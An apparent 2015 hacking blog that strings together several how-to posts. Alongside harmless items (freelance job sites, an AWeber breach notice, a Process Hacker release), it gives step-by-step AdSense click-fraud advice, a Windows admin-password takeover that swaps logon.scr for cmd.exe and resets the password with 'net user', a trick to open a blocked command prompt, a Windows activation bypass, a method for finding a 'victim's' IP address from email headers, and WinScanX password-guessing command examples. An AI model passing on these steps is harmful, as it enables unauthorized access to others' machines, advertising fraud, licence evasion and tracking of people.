Saturday, 31 October 2015

Hack adsense And Earn Money - Online

AdSense is the best PPC(pay-per-click) programme in the world. Because it have a higher paying rate. So if you are using AdSense for a long time and cant make any money with it. You need help. In this tutorial, you will learn what is adsense, how adsense works and how you can cheat them.To hack adsense is not easy but it is also not impossible.

How AdSense works, the basics

You put ads on your website, your visitor see those ads. and when they click on them you get money. if you are thinking that the whole thing is simple as that; then wake up, your in a dream.

Google place their ads, anyone can see them but google will start tracing them if they click on the ads. but the million dollar question is how they trace the clicker? here how they do it:

1. By Cookie.

2. By IP address.

3. By Referrer.

4. By User-agent.

5. Screen Resolution.

We will try to beat google in this tutorial. by hiding or faking those informations.


Now to the earing section. How google calculate earing. if you get your first visitor, your impression will be 1. Impression means now many times your ads are shown to the public. google will calculate the impressions and the clicks, and pay you that amount. But if your 1st visitor clicked on a ad, it will be suspicious. because google will do this calculation:



number of clicks (divided by) number of impression (%)

it will give a numerical result like 10% so google is calculating the ratio of the clicks and impressions. think that you have 13 impressions and 1 visitor clicked on a ad, so the calculation is 

1 / 13% = 7.69230769



this number is called the CTR. but if you have 1 impression and 1 click your CTR will grow to 100. google will ban you if the CTR is higher then 10. [7-9 is safe]



Every ad has it own value. like an insurance ad, it is a 14$ ad. google will not pay that amount to you per click. if your CTR is 7, google will divide the amount with CTR. and you will get the result. like:

14/7=2$/per click

Example-earning of one day.


This a sample and you can do the same with some tricks and secrets.Only clicks on the add as in the sidebar and you will also get the same earning everyday.
steps-
  • Go to google account and sign up to google adsense.
  • copy HTML code from adsense setup>>get adds and paste it on your websites or blogs.
  • and you are ready,every click on the add will give you money.
Precoutions-
  • Sign up or creat account from a computer which you use rarelybecouse that IP address will be blocked and you can not click from there.
  • Do not click too much as google can track it and your account can be blocked.
  • Tell your friends to click on the adds.
  • Send as many e mail to your friends and send them url of your site.

Sunday, 25 October 2015

Best Online Freelance Job Sites

Millions of individuals and small business owners rely on freelance job sites to find work online. Be it simple data entry and web research or content writing, programming, website designing and development etc. Freelance sites may be niche specific or they may allow users to post work related to literally any topic they like.

Whether you need to hire someone or you yourself are looking for work, here is a list of job sites for you.

Elance

elance.com
Elance has over 2 million skilled freelancers from around the world using the platform to find work. From web developers to mobile programmers and designers to writers and marketing pros, you can find them here.

Freelancer

freelancer.com
Freelancer is a massive freelance jobs website with millions of freelance jobs and millions of professional freelancers ready to bid on your projects.

UpWork

upwork.com
Upwork, formally oDesk is the premier platform for top companies to hire and work with the world’s most talented independent professionals.

Guru

guru.com
Guru is the best place for businesses and freelancers to connect, collaborate, and get work done. Find, hire and manage talented freelancers around the world.

Problogger

jobs.problogger.net
The ProBlogger Job Board is where bloggers looking for jobs and companies looking for bloggers to hire meet. Its a good place to find content writing / editing jobs.

ifreelance

ifreelance.com
Find your next freelance job at ifreelance.com. The site offers an effective and affordable way for talented freelance professionals and businesses to connect.

People Per Hour

peopleperhour.com
PeoplePerHour consists of about 250,000 active users, of whom 180,000 are freelancers and 70,000 who are clients. The majority of clients using the services are small companies. As the name suggests, it offers hourly jobs. Common categories include marketing, legal, accounting, writing and programming.

Project 4 Hire

project4hire.com
Freelance Marketplace that connects hiring clients with freelancers such as programmers, website and graphic designers, translators, writers, virtual assistants etc.

Fiverr

fiverr.com
Fiverr is a global online marketplace offering tasks and services, beginning at a cost of $5 per job performed, from which it gets its name.

Journalism Jobs

journalismjobs.com
Into journalism? This site is a gold mine for you. It's clientele includes ESPN, Time Magazine, Slate.com, National Geographic Magazine and many more.

Rent A Coder

rent-acoder.com
As the domain states, the site gives people the tools to rent programmers project based. It intermediates between freelance developers (or companies) and people who need a website, mobile- or desktop-app, brochure design or logos done.

Get A Coder

getacoder.com
Get A Coder is another excellent site for programmers. You'll also find Web Designers and Freelance Writers willing to work at low rates.

99 Designs

99designs.com
A marketplace for graphic design, including logo design, web design and other design contests.

Logo My Way

logomyway.com
Are you a logo creator? or a business looking for an amazing design for your company's logo. LogoMyWay holds logo design contests on it's community of more than 20,000 talented logo designers. The winner earns the money.

How to open command prompt even when it is blocked by admin

Now you can open cmd even when it is blocked by admin.Just follow these steps:
>>Go to Start>All programs>Accessories
>>Open calculator
>>Click Help in the menu and click help topics option
>>When help window opens > Right click on top left corner of that window where you see the symbol  ?
>>And now,click on jump to url and put this : file:///c:/windows/system32/cmd.exe 
>>Now you see that command prompt is opened without admin's permission

AutoShutdown PC bot

Now you can scare your relatives and friends with this auto shutdown PC bot
>>Right Click on desktop >New>Shortcut
>>In shortcut window type:shutdown -s -t 60 -c "the message you want to display"
>>Select next> rename it to anything you like.
>>The number 60 in the code is time taken to shutdown your PC in seconds i.e., 60s
>>Now double cilck on the file and see the tragic.

*To stop this bot: Go to start>Run>Type shutdown-a >Hit enter (within 60s).

How to hack administrator password [New]

I have already shown how to hack admin password in the basic way.If that doesn't work , you can try this new and advance method to hack administrator password.
>>Go to Start>Run , type cmd to open  command prompt
>>Enter this command cd\ to make directory to C:(default drive)
>>Now enter this command cd windows\system32  , to change the directory in command prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup
Admin Hack
Admin Hack
>>Then , type copy logon.scr temphack\logon.scr  to copy logon.scr to temphack folder
>>Now type  copy cmd.exe temphack\cmd.exe copy cmd.exe to temphack folder
>>Then type del logon.scr to delete logon.scr . The backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to rename command prompt to logon screensaver
>>Now you get unprotected command prompt without logging in when windows loads logon screensaver at startup
>>When command prompt appears enter this command
net user admin infinitepc 
>>Now you have hacked admin account and his/her password is set to infinitepc
>>After you have hacked admin you can restart and login with hacked administrator password

Note:
*Dont forget the spaces involved in all the above commands
*To restore this hack just go to temphack folder found in windows\system32 directory and copy those two files in that folder and paste those files in system32 folder(overwrite those files in this folder)
*The above hack works mostly  on FAT/FAT 32 systems not on NTFS systems

How To Delete files without moving deleted files to Recycle Bin

Whenever a file is deleted , it moves into recycle bin.But not from the hard disk.So to remove any file from hard disk directly without moving it to Recycle Bin just follow these steps:
>>Go to Start>Run , type gpedit.msc to open group policy editor
>>In group policy editor , expand User Configuration>Administrative Templates>Windows Componentsand select Windows Explorer


>>On right window pane you can see Setting : Do not move deleted files to recycle bin
>>Double Click it and select Enabled and click Ok
>>That's it now you can delete files in your hard disk without moving it in Recycle Bin


Alternate:You can also delete files from hard disk without placing it in hard disk by selecting file and pressing Shift + Delete keys at a time

How to Use windows-7 without activation



How to Use Windows 7 Without Activation
Submitted by Srikanth on Wednesday, 1 September 201018 Comments

Windows 7Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter
slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit



240 days using “slmgr -rearm” command after registry edit

= 360 Days

Finding IP address in Gmail From Email Header's

Email headers determine where a message is sent, and records the specific path the message follows as it passes through each mail server.
gmail

When You send an email to any of your friends or others could be your Girl friends Never mind. But When you send the email through any email client like Gmail , Yahoo Mail , Hotmail, AOL, Outlook Express, etc it also sends the Email Header which contains Some important information for Us i.e.Hackers.

Basically it is a feature of Mailing protocol.
Now when the victim sends you a Email through any ,Gmail, Yahoo mail etc doesn't matter, then mail comes to your inbox in the form of Email Header but the your Email client changes it and shows only readable part of it.

Well This article is based on how to view Email headers in Gmail. We Will talk about others in Future too. Yeah its a kind of easy tutorial....

Finding IP address in Gmail

  1. Login to your Gmail account with your username and password.
  2. Open the mail.
  3. To display the email headers,
    • Click on the inverted triangle beside Reply. Select Show Orginal.
  4. Look for Received: from followed by the IP address between square brackets [ ].
    Received: from [69.138.30.1] by web31804.mail.mud.yahoo.com
  5. If you find more than one Received: from patterns, select the last one.
Ok Most of the users use Gmail i think and its the most popular one also from the rest of the email clients that's why i liked to write this one first.

Example

Here's an example of a message header for an email sent fromMrJones@emailprovider.com to MrSmith@gmail.com:
Delivered-To: MrSmith@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 29 Mar 2005 15:11:47 -0800 (PST)
Return-Path:
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46; Tue, 29 Mar 2005 15:11:47 -0800 (PST)
Message-ID: <20050329231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 2005 15:11:45 PST
Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST)
From: Mr Jones
Subject: Hello
To: Mr Smith </MRJONES@EMAILPROVIDER.COM></MRJONES@EMAILPROVIDER.COM>
Notice the received is the stuff we need here to get the IP Address of the victim.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29
Ok Hope You all got the idea of the Email Headers in Gmail. More will posted later.


AWeber Hacked : Recent Data Compromise

We just in a split second got news, The great and most popular email subscription and rss manager for Wordpress have been hacked. The recent reports says that they have been hacked by some kind of Third-party Software which they use.AWEBER_logo

The general meaning of this would be the code would be hidden in the app they would be using their systems which took the ownage of there API might be. We are not sure till yet.

It could be Local Buffer overflow on that third party software which they were using. The Apparent effects of this hack was that many spam email message were send to the subscribers. Here is the list of the things which wereNOT compromised and are saved by the team.
  • AWeber customers’ personal information was not compromised.
  • No credit card data was compromised.
  • No customers’ names, “from” or contact email addresses, postal addresses, website URLs or any other profile information were compromised.
  • No affiliates’ names, contact email addresses, tax ID numbers, website URLs or postal addresses were compromised.
We are looking into the details and will provide a further updates soon.
You can read more about this Here

Process Hacker V1.9 Released

Process Hacker is a great tool or you can say a piece of software which acts as a more advance and more reliable software in front of default task manager. it creates a moredetailed and a more understandable version of task manager.

You may remember we have earlier featured it in Process Hacker : Power Packed Task Manager, ok i know the spelling is wrong but don't worry about that we all are humans except the Google bot here :D.

Lets move on with Process Hacker, recently the people behind this software released the new Version of Process Hacker V1.9...

New Stuff :

  • Ability to set I/O priority for processes and threads
  • No more separate Assistant.exe executable required
  • Signature verification now works on x64
  • Now shows signer names (plus a Verified Signer column)
  • Added proper x64 support to structs reader
  • Added basic preprocessor to structs reader
  • WOW64 modules now appear in Handle/DLL searches
  • Small performance improvements
  • Editing object SACLs is now possible with KProcessHacker
Process Hacker runs on both 32-bit and 64-bit Windows, but certain functionality is only available on 32-bit systems, including: Bypassing rootkits and security software when accessing processes, threads, and other objects, Viewing kernel pool limits,Viewing hidden processes, Changing handle attributes, Viewing kernel-mode stack traces and many others.

Screen Shots :


processhacker_small
graphshxdef






Statistics

Processhacker_med
      Process Hacker
      Main Language: C#
                      Total Lines of Code: 130,419
                      Active Contributors: 6
                      Commit Activity Timeline:
                      Commits_spark

Download




WinScanX : A Simple, Fast and Portable Windows Auditing Tool

WinScanX is a state-of-the-art Windows auditing tool designed to help you get your Windows audit done quickly. It's easy to use and no installation is required.

WinScanX was released recently and its the one of the best resource released in 2009 . Its Fast, Simple, Portable and efficient tool for every security professional out there. Its really pa state of art tool.

1

WindScanX is released in two versions, one which is free to download and use and have some features in it which includes the GUI Front-End, Command-Line Interface, Easy-to-Use Reporting, Online Documentation etc and the other PRO version includes these and Quick Domain Audit, Multi-Host Scanning.

  Download WinScanX here                                         WinScanX ScreenShot Here

Windows Audit was created by Reed Arvin in order to provide the audit and security community with tools that are efficient and easy-to-use. These tools are designed to help minimize the time it takes to gather data in a security assessment so that more time can be spent doing what the computer cannot; analyzing the data to provide solid recommendations for identified security issues...

Screen Shot :


1

Command Line Usage :

WinScanX [-abcdefgpklijmnostqurxwyzSWv123] <hostname>
<username> <password>

[-abcdefgpklijmnostqurxwyzSWv123]  -- required argument
<hostname>  -- required argument
<username>  -- optional argument
<password>  -- optional argument

If the <username> and <password> arguments are omitted, this utility will attempt to establish a NetBIOS null session and gather information via the null session.

If the <username> and <password> arguments are both plus signs (+), the existing credentials of the user running this utility will be used.

Examples:
WinScanX -1 10.10.10.10
WinScanX -2 10.10.10.10 + +
WinScanX -3 10.10.10.10 administrator password
WinScanX -3 10.10.10.10 domain\admin password
WinScanX -1 WINSERVER01
WinScanX -2 WINSERVER01 + +
WinScanX -3 WINSERVER01 administrator password
WinScanX -3 WINSERVER01 domain\admin password
WinScanX -1 192.168.1-254
WinScanX -2 192.168.1-254 + +
WinScanX -3 192.168.1-254 administrator password
WinScanX -3 192.168.1-254 domain\admin password
WinScanX -1 IPInputFile.txt WinScanX -2 IPInputFile.txt + +
WinScanX -3 IPInputFile.txt administrator password
WinScanX -3 IPInputFile.txt domain\admin password

The passwords that are attempted for each user account are included in the Dictionary.input file.

The following can also be used in the Dictionary.input file:

<username>   -- The name of the current user
<lcusername> -- The name of the current user in lower case
<ucusername> -- The name of the current user in upper case
<blank>      -- A blank or null password

Download



ads